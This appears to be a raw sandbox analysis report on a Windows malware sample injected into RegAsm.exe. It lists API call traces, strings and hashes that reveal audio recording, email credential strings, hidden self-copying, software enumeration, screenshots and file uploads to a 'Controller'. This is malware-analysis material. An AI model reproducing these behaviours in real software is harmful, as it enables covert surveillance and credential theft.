• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
• API String ID: 738084811-2094122233
• Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
• Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
• Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
• Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
• WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
• WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
• WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
• WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$Write$Create
• String ID: RIFF$WAVE$data$fmt
• API String ID: 1602526932-4212202414
• Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
• Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
• Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
• Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
• GetProcAddress.KERNEL32(00000000), ref: 004072C8
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
• GetProcAddress.KERNEL32(00000000), ref: 004072E0
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
• GetProcAddress.KERNEL32(00000000), ref: 004072F4
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
• GetProcAddress.KERNEL32(00000000), ref: 00407308
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
• GetProcAddress.KERNEL32(00000000), ref: 0040731C
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
• GetProcAddress.KERNEL32(00000000), ref: 00407330
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-255920310
• Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
• Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
• Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
• Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
APIs
  • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
  • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
  • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• _strlen.LIBCMT ref: 10001855
• _strlen.LIBCMT ref: 10001869
• _strlen.LIBCMT ref: 1000188B
• _strlen.LIBCMT ref: 100018AE
• _strlen.LIBCMT ref: 100018C8
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
Similarity
• API ID: _strlen$File$CopyCreateDelete
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
• API String ID: 3296212668-3023110444
• Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
• Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
• Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
APIs
• _wcslen.LIBCMT ref: 0040CE42
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
• _wcslen.LIBCMT ref: 0040CF21
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CFBF
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
• _wcslen.LIBCMT ref: 0040D001
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
• ExitProcess.KERNEL32 ref: 0040D09D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
• API String ID: 1579085052-2309681474
• Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
• Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
• Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
• Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
APIs
• lstrlenW.KERNEL32(?), ref: 0041C0C7
• _memcmp.LIBVCRUNTIME ref: 0041C0DF
• lstrlenW.KERNEL32(?), ref: 0041C0F8
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
• lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
• _wcslen.LIBCMT ref: 0041C1CC
• FindVolumeClose.KERNEL32(?), ref: 0041C1EC
• GetLastError.KERNEL32 ref: 0041C204
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
• lstrcatW.KERNEL32(?,?), ref: 0041C24A
• lstrcpyW.KERNEL32(?,?), ref: 0041C259
• GetLastError.KERNEL32 ref: 0041C261
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
• Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
• Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
• Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
• Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
Similarity
• API ID: _strlen
• String ID: %m$~$Gon~$~F@7$~dra
• API String ID: 4218353326-230879103
• Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
• Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
• Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
APIs
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$EnvironmentVariable$_wcschr
• String ID:
• API String ID: 3899193279-0
• Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
• Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
• Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
• Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
• LoadLibraryA.KERNEL32(?), ref: 00414E52
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
• FreeLibrary.KERNEL32(00000000), ref: 00414E79
• LoadLibraryA.KERNEL32(?), ref: 00414EB1
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
• FreeLibrary.KERNEL32(00000000), ref: 00414ECA
• GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
• FreeLibrary.KERNEL32(00000000), ref: 00414EF0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-744132762
• Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
• Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
• Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
• Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
• RegCloseKey.ADVAPI32(?), ref: 0041CA50
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• API String ID: 1332880857-3714951968
• Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
• Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
• Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
• Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                APIs
                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                • GetCursorPos.USER32(?), ref: 0041D67A
                                                                • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                • String ID: Close
                                                                • API String ID: 1657328048-3535843008
                                                                • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$Info
                                                                • String ID:
                                                                • API String ID: 2509303402-0
                                                                • Opcode ID: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                • Opcode Fuzzy Hash: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                • __aulldiv.LIBCMT ref: 00408D88
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                • API String ID: 3086580692-2582957567
                                                                • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                • _free.LIBCMT ref: 10007CFB
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 10007D1D
                                                                • _free.LIBCMT ref: 10007D32
                                                                • _free.LIBCMT ref: 10007D3D
                                                                • _free.LIBCMT ref: 10007D5F
                                                                • _free.LIBCMT ref: 10007D72
                                                                • _free.LIBCMT ref: 10007D80
                                                                • _free.LIBCMT ref: 10007D8B
                                                                • _free.LIBCMT ref: 10007DC3
                                                                • _free.LIBCMT ref: 10007DCA
                                                                • _free.LIBCMT ref: 10007DE7
                                                                • _free.LIBCMT ref: 10007DFF
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                • _free.LIBCMT ref: 0045137F
                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 004513A1
                                                                • _free.LIBCMT ref: 004513B6
                                                                • _free.LIBCMT ref: 004513C1
                                                                • _free.LIBCMT ref: 004513E3
                                                                • _free.LIBCMT ref: 004513F6
                                                                • _free.LIBCMT ref: 00451404
                                                                • _free.LIBCMT ref: 0045140F
                                                                • _free.LIBCMT ref: 00451447
                                                                • _free.LIBCMT ref: 0045144E
                                                                • _free.LIBCMT ref: 0045146B
                                                                • _free.LIBCMT ref: 00451483
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0041A04A
                                                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                • API String ID: 489098229-1431523004
                                                                • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                  • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
